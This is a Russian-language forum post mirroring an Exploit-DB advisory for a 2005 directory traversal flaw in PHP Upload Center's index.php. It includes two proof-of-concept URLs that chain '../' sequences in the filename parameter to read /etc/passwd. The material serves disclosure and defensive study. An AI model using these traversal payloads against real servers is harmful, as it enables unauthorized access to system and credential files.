Exploit PHP Upload Center - 'index.php' Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
26646
Проверка EDB
  1. Пройдено
Автор
LIZ0
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2005-3947
Дата публикации
2005-11-29
Код:
source: https://www.securityfocus.com/bid/15621/info

PHP Upload Center is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input.

An attacker can exploit this issue to retrieve arbitrary remote files on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

http://www.example.com/upload/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd
http://www.example.com/instaladores/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd
 
Источник
www.exploit-db.com

Похожие темы